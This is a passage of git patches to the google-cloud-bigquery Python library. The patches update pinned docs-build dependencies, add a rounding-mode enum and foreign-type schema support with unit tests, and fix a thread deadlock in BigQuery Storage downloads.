--hash=sha256:dccbe65bd2f7f7ec22c4ff99ed56faa1e9f785482b9bbd7c717e26fd723a1d1e \ + --hash=sha256:dd78cfcda14a1ef52584dbb008f7ac81c1328c0f58184bf9a84c49c605002da6 \ + --hash=sha256:e218488cd232553829be0664c2292d3af2eeeb94b32bea483cf79ac6a694e037 \ + --hash=sha256:e358e64305fe12299a08e08978f51fc21fac060dcfcddd95453eabe5b93ed0e1 \ + --hash=sha256:ea0d8d539afa5eb2728aa1932a988a9a7af94f18582ffae4bc10b3fbdad0626e \ + --hash=sha256:eab677309cdb30d047996b36d34caeda1dc91149e4fdca0b1a039b3f79d9a807 \ + --hash=sha256:eb8178fe3dba6450a3e024e95ac49ed3400e506fd4e9e5c32d30adda88cbd407 \ + --hash=sha256:ecddf25bee22fe4fe3737a399d0d177d72bc22be6913acfab364b40bce1ba83c \ + --hash=sha256:eea6ee1db730b3483adf394ea72f808b6e18cf3cb6454b4d86e04fa8c4327a12 \ + --hash=sha256:f08ff5e948271dc7e18a35641d2f11a4cd8dfd5634f55228b691e62b37125eb3 \ + --hash=sha256:f30bf9fd9be89ecb2360c7d94a711f00c09b976258846efe40db3d05828e8089 \ + --hash=sha256:fa88b843d6e211393a37219e6a1c1df99d35e8fd90446f1118f4216e307e48cd \ + 
--hash=sha256:fc54db6c8593ef7d4b2a331b58653356cf04f67c960f584edb7c3d8c97e8f39e \ + --hash=sha256:fd4ec41f914fa74ad1b8304bbc634b3de73d2a0889bd32076342a573e0779e00 \ + --hash=sha256:ffc9202a29ab3920fa812879e95a9e78b2465fd10be7fcbd042899695d75e616 + # via requests +click==8.1.8 \ + --hash=sha256:63c132bbbed01578a06712a2d1f497bb62d9c1c0d329b7903a866228027263b2 \ + --hash=sha256:ed53c9d8990d83c2a27deae68e4ee337473f6330c040a31d4225c9574d16096a + # via gcp-docuploader colorlog==6.9.0 \ --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ --hash=sha256:bfba54a1b93b94f54e1f4fe48395725a3d92fd2a4af702f6bd70946bdc0c6ac2 - # via nox + # via + # gcp-docuploader + # nox distlib==0.3.9 \ --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 @@ -20,10 +128,78 @@ filelock==3.16.1 \ --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 # via virtualenv +gcp-docuploader==0.6.5 \ + --hash=sha256:30221d4ac3e5a2b9c69aa52fdbef68cc3f27d0e6d0d90e220fc024584b8d2318 \ + --hash=sha256:b7458ef93f605b9d46a4bf3a8dc1755dad1f31d030c8679edf304e343b347eea + # via -r requirements.in +google-api-core==2.24.0 \ + --hash=sha256:10d82ac0fca69c82a25b3efdeefccf6f28e02ebb97925a8cce8edbfe379929d9 \ + --hash=sha256:e255640547a597a4da010876d333208ddac417d60add22b6851a0c66a831fcaf + # via + # google-cloud-core + # google-cloud-storage +google-auth==2.37.0 \ + --hash=sha256:0054623abf1f9c83492c63d3f47e77f0a544caa3d40b2d98e099a611c2dd5d00 \ + --hash=sha256:42664f18290a6be591be5329a96fe30184be1a1badb7292a7f686a9659de9ca0 + # via + # google-api-core + # google-cloud-core + # google-cloud-storage +google-cloud-core==2.4.1 \ + --hash=sha256:9b7749272a812bde58fff28868d0c5e2f585b82f37e09a1f6ed2d4d10f134073 \ + 
--hash=sha256:a9e6a4422b9ac5c29f79a0ede9485473338e2ce78d91f2370c01e730eab22e61 + # via google-cloud-storage +google-cloud-storage==2.19.0 \ + --hash=sha256:aeb971b5c29cf8ab98445082cbfe7b161a1f48ed275822f59ed3f1524ea54fba \ + --hash=sha256:cd05e9e7191ba6cb68934d8eb76054d9be4562aa89dbc4236feee4d7d51342b2 + # via gcp-docuploader +google-crc32c==1.6.0 \ + --hash=sha256:05e2d8c9a2f853ff116db9706b4a27350587f341eda835f46db3c0a8c8ce2f24 \ + --hash=sha256:18e311c64008f1f1379158158bb3f0c8d72635b9eb4f9545f8cf990c5668e59d \ + --hash=sha256:236c87a46cdf06384f614e9092b82c05f81bd34b80248021f729396a78e55d7e \ + --hash=sha256:35834855408429cecf495cac67ccbab802de269e948e27478b1e47dfb6465e57 \ + --hash=sha256:386122eeaaa76951a8196310432c5b0ef3b53590ef4c317ec7588ec554fec5d2 \ + --hash=sha256:40b05ab32a5067525670880eb5d169529089a26fe35dce8891127aeddc1950e8 \ + --hash=sha256:48abd62ca76a2cbe034542ed1b6aee851b6f28aaca4e6551b5599b6f3ef175cc \ + --hash=sha256:50cf2a96da226dcbff8671233ecf37bf6e95de98b2a2ebadbfdf455e6d05df42 \ + --hash=sha256:51c4f54dd8c6dfeb58d1df5e4f7f97df8abf17a36626a217f169893d1d7f3e9f \ + --hash=sha256:5bcc90b34df28a4b38653c36bb5ada35671ad105c99cfe915fb5bed7ad6924aa \ + --hash=sha256:62f6d4a29fea082ac4a3c9be5e415218255cf11684ac6ef5488eea0c9132689b \ + --hash=sha256:6eceb6ad197656a1ff49ebfbbfa870678c75be4344feb35ac1edf694309413dc \ + --hash=sha256:7aec8e88a3583515f9e0957fe4f5f6d8d4997e36d0f61624e70469771584c760 \ + --hash=sha256:91ca8145b060679ec9176e6de4f89b07363d6805bd4760631ef254905503598d \ + --hash=sha256:a184243544811e4a50d345838a883733461e67578959ac59964e43cca2c791e7 \ + --hash=sha256:a9e4b426c3702f3cd23b933436487eb34e01e00327fac20c9aebb68ccf34117d \ + --hash=sha256:bb0966e1c50d0ef5bc743312cc730b533491d60585a9a08f897274e57c3f70e0 \ + --hash=sha256:bb8b3c75bd157010459b15222c3fd30577042a7060e29d42dabce449c087f2b3 \ + --hash=sha256:bd5e7d2445d1a958c266bfa5d04c39932dc54093fa391736dbfdb0f1929c1fb3 \ + 
--hash=sha256:c87d98c7c4a69066fd31701c4e10d178a648c2cac3452e62c6b24dc51f9fcc00 \ + --hash=sha256:d2952396dc604544ea7476b33fe87faedc24d666fb0c2d5ac971a2b9576ab871 \ + --hash=sha256:d8797406499f28b5ef791f339594b0b5fdedf54e203b5066675c406ba69d705c \ + --hash=sha256:d9e9913f7bd69e093b81da4535ce27af842e7bf371cde42d1ae9e9bd382dc0e9 \ + --hash=sha256:e2806553238cd076f0a55bddab37a532b53580e699ed8e5606d0de1f856b5205 \ + --hash=sha256:ebab974b1687509e5c973b5c4b8b146683e101e102e17a86bd196ecaa4d099fc \ + --hash=sha256:ed767bf4ba90104c1216b68111613f0d5926fb3780660ea1198fc469af410e9d \ + --hash=sha256:f7a1fc29803712f80879b0806cb83ab24ce62fc8daf0569f2204a0cfd7f68ed4 + # via + # google-cloud-storage + # google-resumable-media +google-resumable-media==2.7.2 \ + --hash=sha256:3ce7551e9fe6d99e9a126101d2536612bb73486721951e9562fee0f90c6ababa \ + --hash=sha256:5280aed4629f2b60b847b0d42f9857fd4935c11af266744df33d8074cae92fe0 + # via google-cloud-storage +googleapis-common-protos==1.66.0 \ + --hash=sha256:c3e7b33d15fdca5374cc0a7346dd92ffa847425cc4ea941d970f13680052ec8c \ + --hash=sha256:d7abcd75fabb2e0ec9f74466401f6c119a0b498e27370e9be4c94cb7e382b8ed + # via google-api-core +idna==3.10 \ + --hash=sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9 \ + --hash=sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3 + # via requests nox==2024.10.9 \ --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 - # via -r synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in + # via -r requirements.in packaging==24.2 \ --hash=sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759 \ --hash=sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f @@ -32,6 +208,51 @@ platformdirs==4.3.6 \ --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ 
--hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb # via virtualenv +proto-plus==1.25.0 \ + --hash=sha256:c91fc4a65074ade8e458e95ef8bac34d4008daa7cce4a12d6707066fca648961 \ + --hash=sha256:fbb17f57f7bd05a68b7707e745e26528b0b3c34e378db91eef93912c54982d91 + # via google-api-core +protobuf==5.29.3 \ + --hash=sha256:0a18ed4a24198528f2333802eb075e59dea9d679ab7a6c5efb017a59004d849f \ + --hash=sha256:0eb32bfa5219fc8d4111803e9a690658aa2e6366384fd0851064b963b6d1f2a7 \ + --hash=sha256:3ea51771449e1035f26069c4c7fd51fba990d07bc55ba80701c78f886bf9c888 \ + --hash=sha256:5da0f41edaf117bde316404bad1a486cb4ededf8e4a54891296f648e8e076620 \ + --hash=sha256:6ce8cc3389a20693bfde6c6562e03474c40851b44975c9b2bf6df7d8c4f864da \ + --hash=sha256:84a57163a0ccef3f96e4b6a20516cedcf5bb3a95a657131c5c3ac62200d23252 \ + --hash=sha256:a4fa6f80816a9a0678429e84973f2f98cbc218cca434abe8db2ad0bffc98503a \ + --hash=sha256:a8434404bbf139aa9e1300dbf989667a83d42ddda9153d8ab76e0d5dcaca484e \ + --hash=sha256:b89c115d877892a512f79a8114564fb435943b59067615894c3b13cd3e1fa107 \ + --hash=sha256:c027e08a08be10b67c06bf2370b99c811c466398c357e615ca88c91c07f0910f \ + --hash=sha256:daaf63f70f25e8689c072cfad4334ca0ac1d1e05a92fc15c54eb9cf23c3efd84 + # via + # gcp-docuploader + # google-api-core + # googleapis-common-protos + # proto-plus +pyasn1==0.6.1 \ + --hash=sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629 \ + --hash=sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034 + # via + # pyasn1-modules + # rsa +pyasn1-modules==0.4.1 \ + --hash=sha256:49bfa96b45a292b711e986f222502c1c9a5e1f4e568fc30e2574a6c7d07838fd \ + --hash=sha256:c28e2dbf9c06ad61c71a075c7e0f9fd0f1b0bb2d2ad4377f240d33ac2ab60a7c + # via google-auth +requests==2.32.3 \ + --hash=sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760 \ + --hash=sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6 + # via + # google-api-core + # google-cloud-storage 
+rsa==4.9 \ + --hash=sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7 \ + --hash=sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21 + # via google-auth +six==1.17.0 \ + --hash=sha256:4721f391ed90541fddacab5acf947aa0d3dc7d27b2e1e8eda2be8970586c3274 \ + --hash=sha256:ff70335d468e7eb6ec65b95b99d3a2836546063f63acc5171de367e834932a81 + # via gcp-docuploader tomli==2.2.1 \ --hash=sha256:023aa114dd824ade0100497eb2318602af309e5a55595f76b626d6d9f3b7b0a6 \ --hash=sha256:02abe224de6ae62c19f090f68da4e27b10af2b93213d36cf44e6e1c5abd19fdd \ @@ -66,7 +287,11 @@ tomli==2.2.1 \ --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 # via nox -virtualenv==20.28.0 \ - --hash=sha256:23eae1b4516ecd610481eda647f3a7c09aea295055337331bb4e6892ecce47b0 \ - --hash=sha256:2c9c3262bb8e7b87ea801d715fae4495e6032450c71d2309be9550e7364049aa +urllib3==2.3.0 \ + --hash=sha256:1cee9ad369867bfdbbb48b7dd50374c0967a0bb7710050facf0dd6911440e3df \ + --hash=sha256:f8c5449b3cf0861679ce7e0503c7b44b5ec981bec0d1d3795a07f1ba96f0204d + # via requests +virtualenv==20.28.1 \ + --hash=sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb \ + --hash=sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329 # via nox diff --git a/.kokoro/publish-docs.sh b/.kokoro/publish-docs.sh index 233205d58..4ed4aaf13 100755 --- a/.kokoro/publish-docs.sh +++ b/.kokoro/publish-docs.sh @@ -20,10 +20,6 @@ export PYTHONUNBUFFERED=1 export PATH="${HOME}/.local/bin:${PATH}" -# Install nox -python3.10 -m pip install --require-hashes -r .kokoro/requirements.txt -python3.10 -m nox --version - # build docs nox -s docs From 3a4894827f6e73a4a88cb22933c2004697dabcc7 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 31 Jan 2025 13:59:10 -0500 Subject: [PATCH 059/202] feat: add roundingmode enum, wiring, and tests (#2121) * feat: adds roundingmode and entity 
types * Adds rounding_mode to schema file and tests * tweaks RoundingMode docstring and roundingmode logic * Updates tests to apply better coverage for rounding_mode * Modifies docstring * Removes client-side validation, simplifies some code * Updates foreign_type_definition processing --- google/cloud/bigquery/enums.py | 45 ++++++++++++++++++++++++- google/cloud/bigquery/schema.py | 59 +++++++++++++++++++++++++++++++-- tests/unit/test_schema.py | 56 ++++++++++++++++++++++++++++++- 3 files changed, 156 insertions(+), 4 deletions(-) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index d8cbe9969..5519bc989 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -246,6 +246,11 @@ class KeyResultStatementKind: class StandardSqlTypeNames(str, enum.Enum): + """Enum of allowed SQL type names in schema.SchemaField. + + Datatype used in GoogleSQL. + """ + def _generate_next_value_(name, start, count, last_values): return name @@ -267,6 +272,9 @@ def _generate_next_value_(name, start, count, last_values): ARRAY = enum.auto() STRUCT = enum.auto() RANGE = enum.auto() + # NOTE: FOREIGN acts as a wrapper for data types + # not natively understood by BigQuery unless translated + FOREIGN = enum.auto() class EntityTypes(str, enum.Enum): @@ -285,7 +293,10 @@ class EntityTypes(str, enum.Enum): # See also: https://cloud.google.com/bigquery/data-types#legacy_sql_data_types # and https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types class SqlTypeNames(str, enum.Enum): - """Enum of allowed SQL type names in schema.SchemaField.""" + """Enum of allowed SQL type names in schema.SchemaField. + + Datatype used in Legacy SQL. 
+ """ STRING = "STRING" BYTES = "BYTES" @@ -306,6 +317,9 @@ class SqlTypeNames(str, enum.Enum): DATETIME = "DATETIME" INTERVAL = "INTERVAL" # NOTE: not available in legacy types RANGE = "RANGE" # NOTE: not available in legacy types + # NOTE: FOREIGN acts as a wrapper for data types + # not natively understood by BigQuery unless translated + FOREIGN = "FOREIGN" class WriteDisposition(object): @@ -344,3 +358,32 @@ class DeterminismLevel: NOT_DETERMINISTIC = "NOT_DETERMINISTIC" """The UDF is not deterministic.""" + + +class RoundingMode(str, enum.Enum): + """Rounding mode options that can be used when storing NUMERIC or BIGNUMERIC + values. + + ROUNDING_MODE_UNSPECIFIED: will default to using ROUND_HALF_AWAY_FROM_ZERO. + + ROUND_HALF_AWAY_FROM_ZERO: rounds half values away from zero when applying + precision and scale upon writing of NUMERIC and BIGNUMERIC values. + For Scale: 0 + * 1.1, 1.2, 1.3, 1.4 => 1 + * 1.5, 1.6, 1.7, 1.8, 1.9 => 2 + + ROUND_HALF_EVEN: rounds half values to the nearest even value when applying + precision and scale upon writing of NUMERIC and BIGNUMERIC values. 
+ For Scale: 0 + * 1.1, 1.2, 1.3, 1.4 => 1 + * 1.5 => 2 + * 1.6, 1.7, 1.8, 1.9 => 2 + * 2.5 => 2 + """ + + def _generate_next_value_(name, start, count, last_values): + return name + + ROUNDING_MODE_UNSPECIFIED = enum.auto() + ROUND_HALF_AWAY_FROM_ZERO = enum.auto() + ROUND_HALF_EVEN = enum.auto() diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 42dfbfca8..0f011a275 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -22,14 +22,15 @@ from google.cloud.bigquery import _helpers from google.cloud.bigquery import standard_sql +from google.cloud.bigquery import enums from google.cloud.bigquery.enums import StandardSqlTypeNames _STRUCT_TYPES = ("RECORD", "STRUCT") # SQL types reference: -# https://cloud.google.com/bigquery/data-types#legacy_sql_data_types -# https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types +# LEGACY SQL: https://cloud.google.com/bigquery/data-types#legacy_sql_data_types +# GoogleSQL: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types LEGACY_TO_STANDARD_TYPES = { "STRING": StandardSqlTypeNames.STRING, "BYTES": StandardSqlTypeNames.BYTES, @@ -48,6 +49,7 @@ "DATE": StandardSqlTypeNames.DATE, "TIME": StandardSqlTypeNames.TIME, "DATETIME": StandardSqlTypeNames.DATETIME, + "FOREIGN": StandardSqlTypeNames.FOREIGN, # no direct conversion from ARRAY, the latter is represented by mode="REPEATED" } """String names of the legacy SQL types to integer codes of Standard SQL standard_sql.""" @@ -166,6 +168,35 @@ class SchemaField(object): the type is RANGE, this field is required. Possible values for the field element type of a RANGE include `DATE`, `DATETIME` and `TIMESTAMP`. + + rounding_mode: Union[enums.RoundingMode, str, None] + Specifies the rounding mode to be used when storing values of + NUMERIC and BIGNUMERIC type. + + Unspecified will default to using ROUND_HALF_AWAY_FROM_ZERO. 
+ ROUND_HALF_AWAY_FROM_ZERO rounds half values away from zero + when applying precision and scale upon writing of NUMERIC and BIGNUMERIC + values. + + For Scale: 0 + 1.1, 1.2, 1.3, 1.4 => 1 + 1.5, 1.6, 1.7, 1.8, 1.9 => 2 + + ROUND_HALF_EVEN rounds half values to the nearest even value + when applying precision and scale upon writing of NUMERIC and BIGNUMERIC + values. + + For Scale: 0 + 1.1, 1.2, 1.3, 1.4 => 1 + 1.5 => 2 + 1.6, 1.7, 1.8, 1.9 => 2 + 2.5 => 2 + + foreign_type_definition: Optional[str] + Definition of the foreign data type. + + Only valid for top-level schema fields (not nested fields). + If the type is FOREIGN, this field is required. """ def __init__( @@ -181,11 +212,14 @@ def __init__( scale: Union[int, _DefaultSentinel] = _DEFAULT_VALUE, max_length: Union[int, _DefaultSentinel] = _DEFAULT_VALUE, range_element_type: Union[FieldElementType, str, None] = None, + rounding_mode: Union[enums.RoundingMode, str, None] = None, + foreign_type_definition: Optional[str] = None, ): self._properties: Dict[str, Any] = { "name": name, "type": field_type, } + self._properties["name"] = name if mode is not None: self._properties["mode"] = mode.upper() if description is not _DEFAULT_VALUE: @@ -206,6 +240,11 @@ def __init__( self._properties["rangeElementType"] = {"type": range_element_type} if isinstance(range_element_type, FieldElementType): self._properties["rangeElementType"] = range_element_type.to_api_repr() + if rounding_mode is not None: + self._properties["roundingMode"] = rounding_mode + if foreign_type_definition is not None: + self._properties["foreignTypeDefinition"] = foreign_type_definition + if fields: # Don't set the property if it's not set. 
self._properties["fields"] = [field.to_api_repr() for field in fields] @@ -304,6 +343,22 @@ def range_element_type(self): ret = self._properties.get("rangeElementType") return FieldElementType.from_api_repr(ret) + @property + def rounding_mode(self): + """Enum that specifies the rounding mode to be used when storing values of + NUMERIC and BIGNUMERIC type. + """ + return self._properties.get("roundingMode") + + @property + def foreign_type_definition(self): + """Definition of the foreign data type. + + Only valid for top-level schema fields (not nested fields). + If the type is FOREIGN, this field is required. + """ + return self._properties.get("foreignTypeDefinition") + @property def fields(self): """Optional[tuple]: Subfields contained in this field. diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index efbc5d26f..467f1e1de 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -19,6 +19,7 @@ import pytest from google.cloud import bigquery +from google.cloud.bigquery import enums from google.cloud.bigquery.standard_sql import StandardSqlStructType from google.cloud.bigquery import schema from google.cloud.bigquery.schema import PolicyTagList @@ -49,6 +50,8 @@ def test_constructor_defaults(self): self.assertEqual(field.fields, ()) self.assertIsNone(field.policy_tags) self.assertIsNone(field.default_value_expression) + self.assertEqual(field.rounding_mode, None) + self.assertEqual(field.foreign_type_definition, None) def test_constructor_explicit(self): FIELD_DEFAULT_VALUE_EXPRESSION = "This is the default value for this field" @@ -64,6 +67,8 @@ def test_constructor_explicit(self): ) ), default_value_expression=FIELD_DEFAULT_VALUE_EXPRESSION, + rounding_mode=enums.RoundingMode.ROUNDING_MODE_UNSPECIFIED, + foreign_type_definition="INTEGER", ) self.assertEqual(field.name, "test") self.assertEqual(field.field_type, "STRING") @@ -80,6 +85,8 @@ def test_constructor_explicit(self): ) ), ) + self.assertEqual(field.rounding_mode, 
"ROUNDING_MODE_UNSPECIFIED") + self.assertEqual(field.foreign_type_definition, "INTEGER") def test_constructor_explicit_none(self): field = self._make_one("test", "STRING", description=None, policy_tags=None) @@ -137,8 +144,16 @@ def test_to_api_repr(self): {"names": ["foo", "bar"]}, ) + ROUNDINGMODE = enums.RoundingMode.ROUNDING_MODE_UNSPECIFIED + field = self._make_one( - "foo", "INTEGER", "NULLABLE", description="hello world", policy_tags=policy + "foo", + "INTEGER", + "NULLABLE", + description="hello world", + policy_tags=policy, + rounding_mode=ROUNDINGMODE, + foreign_type_definition=None, ) self.assertEqual( field.to_api_repr(), @@ -148,6 +163,7 @@ def test_to_api_repr(self): "type": "INTEGER", "description": "hello world", "policyTags": {"names": ["foo", "bar"]}, + "roundingMode": "ROUNDING_MODE_UNSPECIFIED", }, ) @@ -181,6 +197,7 @@ def test_from_api_repr(self): "description": "test_description", "name": "foo", "type": "record", + "roundingMode": "ROUNDING_MODE_UNSPECIFIED", } ) self.assertEqual(field.name, "foo") @@ -192,6 +209,7 @@ def test_from_api_repr(self): self.assertEqual(field.fields[0].field_type, "INTEGER") self.assertEqual(field.fields[0].mode, "NULLABLE") self.assertEqual(field.range_element_type, None) + self.assertEqual(field.rounding_mode, "ROUNDING_MODE_UNSPECIFIED") def test_from_api_repr_policy(self): field = self._get_target_class().from_api_repr( @@ -283,6 +301,28 @@ def test_fields_property(self): schema_field = self._make_one("boat", "RECORD", fields=fields) self.assertEqual(schema_field.fields, fields) + def test_roundingmode_property_str(self): + ROUNDINGMODE = "ROUND_HALF_AWAY_FROM_ZERO" + schema_field = self._make_one("test", "STRING", rounding_mode=ROUNDINGMODE) + self.assertEqual(schema_field.rounding_mode, ROUNDINGMODE) + + del schema_field + schema_field = self._make_one("test", "STRING") + schema_field._properties["roundingMode"] = ROUNDINGMODE + self.assertEqual(schema_field.rounding_mode, ROUNDINGMODE) + + def 
test_foreign_type_definition_property_str(self): + FOREIGN_TYPE_DEFINITION = "INTEGER" + schema_field = self._make_one( + "test", "STRING", foreign_type_definition=FOREIGN_TYPE_DEFINITION + ) + self.assertEqual(schema_field.foreign_type_definition, FOREIGN_TYPE_DEFINITION) + + del schema_field + schema_field = self._make_one("test", "STRING") + schema_field._properties["foreignTypeDefinition"] = FOREIGN_TYPE_DEFINITION + self.assertEqual(schema_field.foreign_type_definition, FOREIGN_TYPE_DEFINITION) + def test_to_standard_sql_simple_type(self): examples = ( # a few legacy types @@ -457,6 +497,20 @@ def test_to_standard_sql_unknown_type(self): bigquery.StandardSqlTypeNames.TYPE_KIND_UNSPECIFIED, ) + def test_to_standard_sql_foreign_type_valid(self): + legacy_type = "FOREIGN" + standard_type = bigquery.StandardSqlTypeNames.FOREIGN + foreign_type_definition = "INTEGER" + + field = self._make_one( + "some_field", + field_type=legacy_type, + foreign_type_definition=foreign_type_definition, + ) + standard_field = field.to_standard_sql() + self.assertEqual(standard_field.name, "some_field") + self.assertEqual(standard_field.type.type_kind, standard_type) + def test___eq___wrong_type(self): field = self._make_one("test", "STRING") other = object() From 54c8d07f06a8ae460c9e0fb1614e1fbc21efb5df Mon Sep 17 00:00:00 2001 From: Kien Truong Date: Tue, 4 Feb 2025 03:37:26 +0700 Subject: [PATCH 060/202] fix: avoid blocking in download thread when using BQ Storage API (#2034) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This prevents a deadlock between the main thread and download threads when the threadpool is shut down prematurely. 
Co-authored-by: Chalmer Lowe Co-authored-by: Tim Sweña (Swast) --- google/cloud/bigquery/_pandas_helpers.py | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index bf7d10c0f..050672531 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -796,10 +796,15 @@ def _download_table_bqstorage_stream( rowstream = reader.rows(session) for page in rowstream.pages: - if download_state.done: - return item = page_to_item(page) - worker_queue.put(item) + while True: + if download_state.done: + return + try: + worker_queue.put(item, timeout=_PROGRESS_INTERVAL) + break + except queue.Full: # pragma: NO COVER + continue def _nowait(futures): From 5e7d5eda5a8e9d32b38684a2e44f3e8e84e12876 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Thu, 6 Feb 2025 12:43:32 -0600 Subject: [PATCH 061/202] test: add unit test covering the case where worker streams are stopped early (#2127) * test: add unit test covering the case where worker streams are stopped early * use older pyarrow.record_batch constructor * remove flakey log-based tests from snippets * add a gc.collect() call to make sure threads are supposed to be cleaned up --- google/cloud/bigquery/_pandas_helpers.py | 69 ++++++++++---- samples/tests/test_download_public_data.py | 15 +-- .../test_download_public_data_sandbox.py | 17 +--- tests/unit/test__pandas_helpers.py | 93 +++++++++++++++++++ 4 files changed, 146 insertions(+), 48 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 050672531..4f70f6c29 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -20,6 +20,7 @@ from itertools import islice import logging import queue +import threading import warnings from typing import Any, Union, Optional, Callable, Generator, List @@ 
-119,6 +120,21 @@ def __init__(self): # be an atomic operation in the Python language definition (enforced by # the global interpreter lock). self.done = False + # To assist with testing and understanding the behavior of the + # download, use this object as shared state to track how many worker + # threads have started and have gracefully shutdown. + self._started_workers_lock = threading.Lock() + self.started_workers = 0 + self._finished_workers_lock = threading.Lock() + self.finished_workers = 0 + + def start(self): + with self._started_workers_lock: + self.started_workers += 1 + + def finish(self): + with self._finished_workers_lock: + self.finished_workers += 1 BQ_FIELD_TYPE_TO_ARROW_FIELD_METADATA = { @@ -786,25 +802,35 @@ def _bqstorage_page_to_dataframe(column_names, dtypes, page): def _download_table_bqstorage_stream( download_state, bqstorage_client, session, stream, worker_queue, page_to_item ): - reader = bqstorage_client.read_rows(stream.name) + download_state.start() + try: + reader = bqstorage_client.read_rows(stream.name) - # Avoid deprecation warnings for passing in unnecessary read session. - # https://github.com/googleapis/python-bigquery-storage/issues/229 - if _versions_helpers.BQ_STORAGE_VERSIONS.is_read_session_optional: - rowstream = reader.rows() - else: - rowstream = reader.rows(session) - - for page in rowstream.pages: - item = page_to_item(page) - while True: - if download_state.done: - return - try: - worker_queue.put(item, timeout=_PROGRESS_INTERVAL) - break - except queue.Full: # pragma: NO COVER - continue + # Avoid deprecation warnings for passing in unnecessary read session. 
+ # https://github.com/googleapis/python-bigquery-storage/issues/229 + if _versions_helpers.BQ_STORAGE_VERSIONS.is_read_session_optional: + rowstream = reader.rows() + else: + rowstream = reader.rows(session) + + for page in rowstream.pages: + item = page_to_item(page) + + # Make sure we set a timeout on put() so that we give the worker + # thread opportunities to shutdown gracefully, for example if the + # parent thread shuts down or the parent generator object which + # collects rows from all workers goes out of scope. See: + # https://github.com/googleapis/python-bigquery/issues/2032 + while True: + if download_state.done: + return + try: + worker_queue.put(item, timeout=_PROGRESS_INTERVAL) + break + except queue.Full: + continue + finally: + download_state.finish() def _nowait(futures): @@ -830,6 +856,7 @@ def _download_table_bqstorage( page_to_item: Optional[Callable] = None, max_queue_size: Any = _MAX_QUEUE_SIZE_DEFAULT, max_stream_count: Optional[int] = None, + download_state: Optional[_DownloadState] = None, ) -> Generator[Any, None, None]: """Downloads a BigQuery table using the BigQuery Storage API. @@ -857,6 +884,9 @@ def _download_table_bqstorage( is True, the requested streams are limited to 1 regardless of the `max_stream_count` value. If 0 or None, then the number of requested streams will be unbounded. Defaults to None. + download_state (Optional[_DownloadState]): + A threadsafe state object which can be used to observe the + behavior of the worker threads created by this method. Yields: pandas.DataFrame: Pandas DataFrames, one for each chunk of data @@ -915,7 +945,8 @@ def _download_table_bqstorage( # Use _DownloadState to notify worker threads when to quit. # See: https://stackoverflow.com/a/29237343/101923 - download_state = _DownloadState() + if download_state is None: + download_state = _DownloadState() # Create a queue to collect frames as they are created in each thread. 
